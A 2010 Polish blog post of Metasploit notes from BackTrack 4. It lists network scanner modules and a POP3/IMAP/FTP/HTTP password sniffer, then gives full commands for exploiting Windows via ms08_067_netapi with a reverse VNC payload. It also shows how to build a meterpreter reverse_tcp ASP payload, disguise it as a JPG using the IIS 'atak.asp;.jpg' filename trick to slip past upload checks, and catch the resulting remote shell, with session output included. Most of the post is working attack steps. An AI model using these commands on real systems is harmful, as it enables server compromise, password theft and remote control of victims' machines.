piątek, 12 marca 2010

METASPLOIT

BT4

- skanowanie podsieci porty 80

./pentest/exploits/framework3/msfconsole

use scanner/portscan/syn

set PORTS 80

set RHOSTS 192.168.0.0/24

set THREADS 10

run


- wersja systemu

use scanner/smb/version

- MSSQL

use scanner/mssql/mssql_ping

- skanowanie idle

use scanner/ip/ipidseq

- skanowanie ssh

use scanner/ssh/ssh_version

- anonimowe FTP

use scanner/ftp/anonymouse

- SNMP

use scanner/snmp/community

- podsłuchiwanie haseł pop3,imap,ftp,http

use auxiliary/sniffer/psnuffle


- przejęcie komputera z WINDOWS

use windows/smb/ms08_067_netapi

set RHOST 10.32.1.171 - cel

set lhost 10.32.1.85 - napastnik

set payload windows/vncinject/reverse_tcp

exploit


-----------------------------------------------------------------------------------------------

Do wygenerowania złośliwego kodu ASP posłużą nam następujące polecenia:
msfpayload windows/meterpreter/reverse_tcp \
LHOST=10.20.30.40 LPORT=8443 R | \
msfencode -t asp -o atak.asp


$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 10.20.30.40
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

Po utworzeniu listenera oczekującego na połączenie, możemy już utworzyć testowy plik w jego ostatecznej postaci, za pomocą polecenia:
cat saint.jpg atak.asp > "atak.asp;.jpg"

Jak widać, nasz skrypt został połączony z plikiem JPG (w celu oszukania mechanizmów sprawdzania zawartości pliku) oraz nazwany atak.asp;.jpg (co pozwala na wykorzystanie właściwej luki serwera IIS w sposobie interpretacji nazw plików).

Teraz pozostaje już tylko załadowanie naszego pliku na serwer poprzez odpowiedni formularz (odpowiednia nazwa oraz zawartość graficzna pozwolą na obejście podstawowych mechanizmów zabezpieczających), a następnie wyświetlenie strony internetowej zawierającej załadowany uprzednio plik. Jeśli katalog do którego trafił nasz plik dysponuje prawami wykonania, złośliwy skrypt ASP zostanie wykonany. To z kolei spowoduje nawiązanie połączenie z przygotowanym wcześniej listenerem:

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened

Następnie, po wydaniu w konsoli listenera polecenia:
msf exploit(handler) > sessions -i 1
oraz w kolejnej konsoli polecenia:
meterpreter > shell
otrzymamy ostatecznie wiersz poleceń docelowego serwera:

Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\serwer>

-----------------------------------------------------------------------------------------------

http://www.hcsl.pl/2010/03/wamanie-do-win-xp-sp3-poprzez-ie.html

-----------------------------------------------------------------------------------------------

http://www.hcsl.pl/search/label/Testy%20penetracyjne

-----------------------------------------------------------------------------------------------


Brak komentarzy:

Prześlij komentarz